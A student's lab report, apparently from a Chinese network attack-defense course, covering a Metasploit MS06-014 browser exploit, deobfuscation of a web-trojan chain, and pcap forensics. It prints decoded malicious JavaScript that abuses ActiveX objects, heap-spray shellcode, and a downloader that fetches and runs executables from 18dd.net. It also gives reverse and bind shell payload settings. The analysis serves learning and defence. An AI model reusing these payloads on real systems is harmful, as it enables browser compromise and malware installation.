20232917白胤廷 2023-2024-2 《网络攻防实践》实践十一报告

最新推荐文章于 2024-07-19 11:20:49 发布
最新推荐文章于 2024-07-19 11:20:49 发布
阅读量827 收藏 20
点赞数 17
文章标签: 网络 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51457231/article/details/139333272
版权

20232917白胤廷 2023-2024-2 《网络攻防实践》实践十一报告

1.实践内容

(1)web浏览器渗透攻击
任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。
实验步骤:
①选择使用Metasploit中的MS06-014渗透攻击模块
②选择PAYLOAD为任意远程Shell连接
③设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本
④在靶机环境中启动浏览器,验证与服务器的连通性,并访问而已网页木马脚本URL
⑤在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令
(2)取证分析实践—网页木马攻击场景分析
实践过程:
①首先你应该访问start.html,在这个文件中给出了new09.htm的地址,
②在进入 htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到 http://192.168.68.253/scom/hashed/哈希值下去下载对应的文件(注意:文件名中的英文字母为小写,且没有扩展名),即为解密出的地址对应的文件。
③如果解密出的地址给出的是网页或脚本文件,请继续解密。
④如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。
⑤重复以上过程直到这些文件被全部分析完成。
(3)攻防对抗实践—web浏览器渗透攻击攻防
攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。
防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。

2.实践过程

实践一:web浏览器渗透攻击实验

使用攻击机和windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。
环境:攻击机:Windows XP_Attacker攻击机(192.168.200.2),其中安装了Metasploit渗透攻击框架软件。
靶机:未打补丁的windows靶机,windows2kS(192.168.200.124)。
1、选择使用Metasploit中的MS06-014渗透攻击模块(ie_createobject);
在这里插入图片描述
2、选择PAYLOAD为任意远程Shell连接;
在这里插入图片描述
3、选择服务器地址(SVRHOST或LHOST)和URL参数,运行exploit,构造出恶意网页木马脚本;
在这里插入图片描述
4、在靶机环境中启动浏览器,验证与服务器的联通性,并访问恶意网页木马脚本URL;
在这里插入图片描述
由于用这个负载之后,攻击机发送完html之后没有收到shell打开的反应,所以换了windows/shell/bind_tcp 5、在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起得远程控制会话SESSSION,在靶机上远程执行命令。
在这里插入图片描述
在这里插入图片描述

实践二 取证分析实践:剖析一个世纪的网页木马攻击场景

任务:根据说明逐步分析,得到最终的木马文件的内容。
首先访问start.html,在这个文件中给出了new09.htm的地址,在进入new09.htm后,每解密出一个我那件地址,请对其做32位MD5散列,以散列值位文件名到http://netsec.ccert.edu.cn/hacking/目录,下去下载对应的文件(注意:文件名中的英文字母为小写,且没有扩展名),即为解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。重复以上过程指导这些文件被全部分析完成。请注意:被散列的文件地址应该是标准的URL形式,形如http://xx.18dd.net/a/b.html,否则会导致散列值计算不正确而无法继续。
问题
1、试述你是如何一步步从所给的网页中获取最后的真实代码的?
2、网页和JavaScript代码中都是用了什么样的加密方法?你是如何解密的?
3、从解密后的结果来看,攻击者够早的网页木马利用了哪些安全漏洞?
4、解密后发现了多少个可执行文件?这些可执行文件中有下载器么?如果有,他们下载了哪些程序?这些程序又是起什么作用?(请举例分析)

答:(1)将http://192.168.68.253/scom/start/html使用freshow查看其源代码并将源代码保存到文件start.html中,在其中找到new09.htm页面的链接:http://192.168.68.253/scom/new09/html
之后在new09.html中找到两个链接。
网页加密方法:www.cha88.cn
http://aa.18dd.net/aa/kl.htm MD5:7f60672dcd6b5e90b6772545ee219bd3
http://js.users.51.la/1299644.js MD5:http://js.users.51.la/1299644.js
从hashed文件夹中找到这两个文件,并一一打开查看
在这里插入图片描述
可以看到一种加密方法:xxtea+base64加密方法。需要找到其加密秘钥,xxtea_decrypt函数的第二个参数就是秘钥,将这个秘钥从16进制转换为字符串:

在这里插入图片描述
得到秘钥script
之后对xxtea的加密进行解密:
在这里插入图片描述
解密后:
在这里插入图片描述
使用xxtea在线加解密工具解密后的十六进制

eval("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x69\x6e\x69\x74\x28\x29\x7b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x29\x3b\x7d\x0d\x0a\x77\x69\x6e\x64\x6f\x77\x2e\x6f\x6e\x6c\x6f\x61\x64\x20\x3d\x20\x69\x6e\x69\x74\x3b\x0d\x0a\x69\x66\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x2e\x69\x6e\x64\x65\x78\x4f\x66\x28\x27\x4f\x4b\x27\x29\x3d\x3d\x2d\x31\x29\x7b\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x65\x3b\x0d\x0a\x76\x61\x72\x20\x61\x64\x6f\x3d\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74\x28\x22\x6f\x62\x6a\x65\x63\x74\x22\x29\x29\x3b\x0d\x0a\x61\x64\x6f\x2e\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x28\x22\x63\x6c\x61\x73\x73\x69\x64\x22\x2c\x22\x63\x6c\x73\x69\x64\x3a\x42\x44\x39\x36\x43\x35\x35\x36\x2d\x36\x35\x41\x33\x2d\x31\x31\x44\x30\x2d\x39\x38\x33\x41\x2d\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36\x22\x29\x3b\x0d\x0a\x76\x61\x72\x20\x61\x73\x3d\x61\x64\x6f\x2e\x63\x72\x65\x61\x74\x65\x6f\x62\x6a\x65\x63\x74\x28\x22\x41\x64\x6f\x64\x62\x2e\x53\x74\x72\x65\x61\x6d\x22\x2c\x22\x22\x29\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x65\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x0d\x0a\x76\x61\x72\x20\x65\x78\x70\x69\x72\x65\x73\x3d\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x3b\x0d\x0a\x65\x78\x70\x69\x72\x65\x73\x2e\x73\x65\x74\x54\x69\x6d\x65\x28\x65\x78\x70\x69\x72\x65\x73\x2e\x67\x65\x74\x54\x69\x6d\x65\x28\x29\x2b\x32\x34\x2a\x36\x30\x2a\x36\x30\x2a\x31\x30\x30\x30\x29\x3b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x3d\x27\x63\x65\x3d\x77\x69\x6e\x64\x6f\x77\x73\x78\x70\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d\x27\x2b\x65\x78\x70\x69\x72\x65\x73\x2e\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67\x28\x29\x3b\x0d\x0a\x69\x66\x28\x65\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x61\x61\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x5c\x2f\x61\x61\x5c\x2f\x31\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x7d\x0d\x0a\x65\x6c\x73\x65\x7b\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x66\x3b\x76\x61\x72\x20\x73\x74\x6f\x72\x6d\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x4d\x50\x53\x2e\x53\x74\x6f\x72\x6d\x50\x6c\x61\x79\x65\x72\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x66\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x66\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x61\x61\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x5c\x2f\x61\x61\x5c\x2f\x62\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x7d\x7d\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x67\x3b\x76\x61\x72\x20\x70\x70\x73\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x50\x4f\x57\x45\x52\x50\x4c\x41\x59\x45\x52\x2e\x50\x6f\x77\x65\x72\x50\x6c\x61\x79\x65\x72\x43\x74\x72\x6c\x2e\x31\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x67\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x67\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x61\x61\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x5c\x2f\x61\x61\x5c\x2f\x70\x70\x73\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x7d\x7d\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x68\x3b\x76\x61\x72\x20\x6f\x62\x6a\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x42\x61\x69\x64\x75\x42\x61\x72\x2e\x54\x6f\x6f\x6c\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x68\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x68\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x6f\x62\x6a\x2e\x44\x6c\x6f\x61\x64\x44\x53\x28\x22\x68\x74\x74\x70\x3a\x2f\x2f\x64\x6f\x77\x6e\x2e\x31\x38\x64\x64\x2e\x6e\x65\x74\x2f\x62\x62\x2f\x62\x64\x2e\x63\x61\x62\x22\x2c\x20\x22\x62\x64\x2e\x65\x78\x65\x22\x2c\x20\x30\x29\x7d\x7d\x0d\x0a\x7d\x7d\x7d")
</script>

转换为字符串之后得到:

66756e6374696f6e20696e697428297b646f63756d656e742e777269746528293b7d0d0a77696e646f772e6f6e6c6f6164203d20696e69743b0d0a696628646f63756d656e742e636f6f6b69652e696e6465784f6628274f4b27293d3d2d31297b0d0a7472797b76617220653b0d0a7661722061646f3d28646f63756d656e742e637265617465456c656d656e7428226f626a6563742229293b0d0a61646f2e7365744174747269627574652822636c6173736964222c22636c7369643a42443936433535362d363541332d313144302d393833412d30304330344643323945333622293b0d0a7661722061733d61646f2e6372656174656f626a656374282241646f64622e53747265616d222c2222297d0d0a63617463682865297b7d3b0d0a66696e616c6c797b0d0a76617220657870697265733d6e6577204461746528293b0d0a657870697265732e73657454696d6528657870697265732e67657454696d6528292b32342a36302a36302a31303030293b0d0a646f63756d656e742e636f6f6b69653d2763653d77696e646f777378703b706174683d2f3b657870697265733d272b657870697265732e746f474d54537472696e6728293b0d0a69662865213d225b6f626a656374204572726f725d22297b0d0a646f63756d656e742e777269746528223c736372697074207372633d687474703a5c2f5c2f61612e313864642e6e65745c2f61615c2f312e6a733e3c5c2f7363726970743e22297d0d0a656c73657b0d0a7472797b76617220663b7661722073746f726d3d6e657720416374697665584f626a65637428224d50532e53746f726d506c6179657222293b7d0d0a63617463682866297b7d3b0d0a66696e616c6c797b69662866213d225b6f626a656374204572726f725d22297b0d0a646f63756d656e742e777269746528223c736372697074207372633d687474703a5c2f5c2f61612e313864642e6e65745c2f61615c2f622e6a733e3c5c2f7363726970743e22297d7d0d0a7472797b76617220673b766172207070733d6e657720416374697665584f626a6563742822504f574552504c415945522e506f776572506c617965724374726c2e3122293b7d0d0a63617463682867297b7d3b0d0a66696e616c6c797b69662867213d225b6f626a656374204572726f725d22297b0d0a646f63756d656e742e777269746528223c736372697074207372633d687474703a5c2f5c2f61612e313864642e6e65745c2f61615c2f7070732e6a733e3c5c2f7363726970743e22297d7d0d0a7472797b76617220683b766172206f626a3d6e657720416374697665584f626a656374282242616964754261722e546f6f6c22293b7d0d0a63617463682868297b7d3b0d0a66696e616c6c797b69662868213d225b6f626a656374204572726f725d22297b0d0a6f626a2e446c6f616444532822687474703a2f2f646f776e2e313864642e6e65742f62622f62642e636162222c202262642e657865222c2030297d7d0d0a7d7d7d

转换完成之后,得到代码:

function init(){
      document.write();
}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
      try{var e;
      var ado=(document.createElement("object"));
      ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
      var as=ado.createobject("Adodb.Stream","")//Adodb.Stream
}
catch(e){};
finally{
      var expires=new Date();
      expires.setTime(expires.getTime()+24*60*60*1000);
      document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
      if(e!="[object Error]"){
            document.write("<script src=http:\/\/aa.18dd.net\/aa\/1.js><\/script>")}
      else{
      try{      
            var f;
            var storm=new ActiveXObject("MPS.StormPlayer");//MPS.StormPlayer
      }catch(f){};
finally{
if(f!="[object Error]"){
      document.write("<script src=http:\/\/aa.18dd.net\/aa\/b.js><\/script>")}}
      try{
      var g;
      var pps=new                     ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}//POWERPLAYER.PowerPlayerCtrl.1
      catch(g){};
      finally{if(g!="[object Error]"){
      document.write("<script src=http:\/\/aa.18dd.net\/aa\/pps.js><\/script>")}}//写入恶意脚本
      try{
            var h;
            var obj=new ActiveXObject("BaiduBar.Tool");//BaiduBar.Tool
      }
      catch(h){};
      finally{if(h!="[object Error]"){
      obj.DloadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)}}//下载
      }}}

网页木马的shellcode通常会将包含病毒的url写入,根据url中’/‘的ASCII码’2F’进行分析
在这里插入图片描述
在最后一段中有四个’/',猜测这应该就是一个url,对该ascii码串使用preshow和16进制进行url转换,得到url:http://down.18dd.net/bb/bf.exe,也是对一个可执行文件进行下载。
对于http://aa.18dd.net/aa/pps.js,打开对应的MD5值为名的文件,其内容为八进制,对之进行字符串转换,得到:

/*%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u*/
pps=(document.createElement("object"));
pps.setAttribute("classid","clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458")
var shellcode = unescape("%uf3e9%u0000"+
"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u7070%u2e73%u7865%u0065");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<400; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 500) buffer+="\x0a\x0a\x0a\x0a";
pps.Logo = buffer

在这段代码中的shellcode中,可以解析出url:http://down.18dd.net/bb/pps.exe,也是下载一个可执行文件

对于http://down.18dd.net/bb/bd.cab,打开之后,得到十六进制以及乱码

在这里插入图片描述
于是使用IDA Pro打开,也没看出来。先不管他了,参考其他同学的博客说是一个db.exe的可执行文件的url。 并且对这几个url的md5值,再进行求md5值,会发现他们的值都相同(1290ecd734d68d52318ea9016dc6fe63),所以这些文件应该是相同的作用。 对pps.exe进行分析 使用脱壳工具脱壳,可以看到这个文件不需要脱壳。

在这里插入图片描述
之后使用IDA Pro打开该可执行文件,查看字符串 刚开始有很多.exe文件,可能要下载一些木马,之后又有autorun自动执行,还有一些ddl,以及对IE进行操作的命令。 再根据其中的中文字符,“执行保护”,“IE允许执行”等,该可执行文件可能具有自我保护能力。 “为即插即用设备提供支持”,猜测是要建立服务。

在这里插入图片描述
在这里插入图片描述
对0.exe文件进行分析,可以看到是有加壳的
在这里插入图片描述
对之进行脱壳,再用IDA Pro查看其字符串 从下图中可以看到是在获得一些受害主机的一些系统信息,除此之外,好像没干别的什么,那就再打开后面的一些exe文件看看
在这里插入图片描述
对3.exe脱壳并分析。
看到一些对注册表的改写,之后还有创建快照
在这里插入图片描述

实践三 Web 浏览器渗透攻击攻防对抗

攻击方使用 Metasploit 构造出攻击至少两个不同 Web 浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理组装成一个URL链接,通过具有欺骗性的电子邮件发送给防守方。
防守方对电子邮件中的挂马链接进行提取、解混淆分析,尝试恢复出渗透攻击代码的原始形态, 并分析出这些渗透代码都是攻击哪些 Web 浏览端软件的哪些安全漏洞。
双方撰写详细实验分析报告, 对攻防对抗过程进行总结。
攻击方式与实践一相同。
防守方访问到这个网页之后,对该网页的源代码进行查看和保存,可以看到源码之间的间隙很大,是在通过大片的空白以及将字符串使用“+”进行隔开,防止被反病毒软件查杀。
在这里插入图片描述
对代码格式进行调整之后

<html>

	<head>
		<title></title>
		<script language="javascript">
			function gCxloZiKnraRiVfaHsIlPOuQOGsV(o, n) { 
				var r = null; 
				try { eval("r=o.CreateObject(n)") } 
				catch(e) {} 
				if(!r) {
					try { 
						eval("r=o.CreateObject(n,'')") 
					} catch(e) {} 
				}
					if(!r) { 
						try { eval("r=o.CreateObject(n,'','')") } 
						catch(e) {} } 
						if(!r) { 
							try { 
								eval("r=o.GetObject('',n)") } 
								catch(e) {} 
						}
								if(!r) { 
									try { 
										eval("r=o.GetObject(n,'')") } 
										catch(e) {} 
								} 
								if(!r) { 
									try { 
										eval("r=o.GetObject(n)") 
									} catch(e) {} 
								} 
								return(r) 
			}

			function zlGvEUjDk(a) { 
				var s = gCxloZiKnraRiVfaHsIlPOuQOGsV(a, "WScript.Shell"); 
				var o = gCxloZiKnraRiVfaHsIlPOuQOGsV(a, "ADODB.Stream"); 
				var e = s.Environment("Process"); 
				var url = document.location + '/payload'; 
				var xml = null; 
				var bin = e.Item("TEMP") + "\\xeawGEgzOudIUf.exe";//下载的可执行文件
				var dat; try { xml = new XMLHttpRequest() 
				}
				catch(e) { try { xml = new ActiveXObject("Microsoft.XMLHTTP") 
				} catch(e) { 
					xml = new ActiveXObject("MSXML2.ServerXMLHTTP") 
				} 
				} 
				if(!xml) { return(0) } 
				xml.open("GET", url, false);
				xml.send(null);
				dat = xml.responseBody;
				o.Type = 1;
				o.Mode = 3;
				o.Open();
				o.Write(dat);
				o.SaveToFile(bin, 2);
				s.Run(bin, 0) }

			function UfOJvYCnWIPu() { var i = 0; var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}', //可以根据数组中的内容确定,这个可以确定是被利用的MS06-014
			'{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', 
			'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', 
			'{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', 
			'{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', 
			'{E8CCCDDF-CA28-496b-B050-6C07C962476B}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', 
			'{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', 
			null); 
			while(t[i]) { 
				var a = null; 
				if(t[i].substring(0, 1) == '{') { 
					a = document.createElement("object");
					a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1)) 
				}
				else { 
					try { 
						a = new ActiveXObject(t[i]) 
					} 
					catch(e) {} 
				} 
				if(a) 
				{ 
					try {
					var b = gCxloZiKnraRiVfaHsIlPOuQOGsV(a, "WScript.Shell"); 
					if(b) { 
						zlGvEUjDk(a); return(0) 
					} 
					} catch(e) {} } i++ } 
			}
		</script>
	</head>

	<body onload='UfOJvYCnWIPu()'>lHVktKHkSJUvBMeTdoZ</body>

</html>

可以看到靶机的后台有一个代码中的相应的可执行文件
在这里插入图片描述

实践四 WEB浏览器遭遇攻击、取证分析

1、通过分析pcap文件,回答下面问题。
2、列出在捕获文件中的应用层协议类型,是针对哪个或哪些协议的?
3、列出IP地址、主机名、域名,猜测攻击场景的环境配置。
4、列出所有网页页面,其中哪些页面包含了可疑的、恶意的js脚本,谁在连接这些页面,目的是什么?
5、请给出攻击者执行攻击动作的概要描述。
6、攻击者引入了哪些技巧带来了困难。
7、攻击者的目标是哪个操作系统?哪个软件?哪个漏洞?如何组织?
8、shellcode执行了哪些操作?比较他们之间MD5的差异?
9、在攻击场景中有二进制可执行代码参与吗?目的是什么?
答:
下载工具chaoosreaer:git clone https://github.com/brendangregg/Chaosreader.git
使用该工具读取改文件,命令:./chaosreader suspicious-time.pcap,可以看到通信中有HTTP,ICMP,netbios,bootps,DNS的应用层协议,其中ICMP用于传递网络控制报文;netbios在局域网中提供名字登记和解析、可靠的基于连接的通信和不可靠的无连接通信。bootps引导协议,也被DHCP服务使用,DNS用于解析域名。所以攻击只可能来自http数据包。
在这里插入图片描述
使用命令

for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort –u

列出文件中的IP地址,主机名和域名。从得到的结果中可以看出,有这么几个域名,其中rapidshare.com.eyu32.ru对应攻击地址192.168.56.50,sploitme.com.cn对应192.168.56.52,shop.honeynet.sg对应192.168.56.51,其余的关于谷歌的应该是正常操作。
DNS服务网址(根据chaosreader的查询结果可以看到):10.0.2.2,10.0.5.2,10.0.4.2,10.0.3.2。
靶机地址:10.0.2.15, 10.0.3.15, 10.0.4.15, 10.0.5.15
模拟被侵入主机:192.168.56.50(rapidshare.com.eyu32.ru),192.168.56.51(shop.honeynet.sg)
攻击机地址:192.168.56.52(sploitme.com.cn)

在这里插入图片描述
之后在wireshark中对NBNS数据包过滤,根据netbios显示的主机名和工作组都相同,判断攻击场景是在虚拟机下完成的
在这里插入图片描述
查看网页页面 session_0006.part_01.html,该页面是一个钓鱼网站,对应于rapidshare.com.eyu32.ru/login.php
在这里插入图片描述
sploitme.com.cn对应session_0007.part_02.html
在这里插入图片描述
shop.honeynet.sg/catalog/(在线商城)对应于页面session_0032.part_01.html
在这里插入图片描述
攻击动作的概要描述
攻击方将恶意代码注入sploitme.com.cn/?alick=X的iframe框架中。
受害者打开这个页面之后,会被现实sploitme.com.cn/?alick=X的内容,该页面被重定向到伪造的404页面。

在这里插入图片描述
该页面会检查用户代理字符串等参数,之后fg/show.php使用JavaScript代码攻击受害主机。 如果任何漏洞利用成功,接下来客户端的计算机将下载并执行位于sploitme.com.cn/fg/load.php?e=X的文件,恶意软件访问www.honeynet.org
攻击者进行的混淆技巧
(1)伪造404 not found页面。
(2)JavaScript混淆

在这里插入图片描述
漏洞分析
在142组tcp数据包进行tcp数据流分析:
针对windows上的ie浏览器上的漏洞,ActiveX组件不安全。

3.学习中遇到的问题及解决

  • 问题1:在实验一中靶机进入恶意网站后连接始终不成功;
  • 问题1解决方案:将载荷改为set payload generic/shell_reverse_tcp即可。

4.实践总结

在本次实验中主要进行了三个部分,首先进行了较为简单的渗透攻击,然后分析了一个网页木马攻击场景的具体流程,最后再实际实践模拟了一下攻防双方,实现了一下攻防。本次实验难度不是很大,但是工作量不小,也没太接触过实验二的这种分析,对网页源代码也不够熟悉,不能比较快的找到问题所在。总之这次的实验相当贴近事迹,但是可能使用的漏洞相对比较古老,对目前的机器可能早就失效了,但是原理差距没有那么大,有很强的借鉴意义!

20232917白胤廷
关注
  • 17
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
华中科技大学网络攻防实践相关
02-14
华中科技大学网络攻防实践相关
案例2-2022年xx网络安全攻防演习防守方总结报告.pdf
08-26
网络安全攻防演习防守方总结报告
parse_url小结
weixin_42478365的博客
10-06 825
1.parse_url $url = "/baidu.com:80"; $url1 = "/baidu.com:80a"; $url2 = "//pupiles.com/about:1234"; $url3 = "//baidu.com:80a"; var_dump(parse_url($url)); var_dump(parse_url($url1)); var_dump(parse_url($url2)); var_dump(parse_url($url3)); 执行以上代码:,将得到下面的结果
20232917白胤廷 2023-2024-2 《网络攻防实践实践报告
weixin_51457231的博客
04-18 825
通过这次实验,我学到了非常有用的渗透框架metasploit,这个框架集成了许多漏洞攻击模块,通过学习使用这个框架,我了解到了很多漏洞,以及攻击漏洞的原理和方法,并且在进行实践三的时候,通过和同学之间的互相攻击,让我更加明确了攻击的原理,受益匪浅。
20232917白胤廷 2023-2024-2 《网络攻防实践实践报告
weixin_51457231的博客
05-16 773
本次实践内容主要集中在对SQL注入攻击以及XSS攻击的实施与防御方面;通过本次实践,我对SQL注入攻击、XSS攻击都有了一个初步的了解,对XSS蠕虫的编写也有了一个初步的认识;初步学习web网络攻防,使我对网络攻击与防御技术有了一个更加深入的了解。
20232917白胤廷 2023-2024-2 《网络攻防实践实践报告
weixin_51457231的博客
05-09 880
在进行“注入一个自己制作的shellcode并运行这段shellcode”这项实验时,我因为弄不清楚原理照着实验指导照猫画虎导致了多次失败,幸亏在实践中搞明白了一开始的那一段攻击代码是中的起始的1234是存放覆盖ret地址的位置,在让我明白了第一次构造是尝试,第二次才是动真格的。总之,此次实验不仅让我感受到Linux基本功还不够扎实,更表现了我动手能力的不足,希望在今后我能够收获知识与实践能力。
计算机网络攻防-(共37张PPT).pptx
11-14
计算机网络攻防-(共37张PPT).pptx
网络攻防实践_课程报告.zip
07-19
网络攻防实践_课程报告.zip
网络攻防技术实践-防火墙.doc
05-12
网络安全实验
SpringBoot整合SSE,实现后端主动推送DEMO
zjy660358的专栏
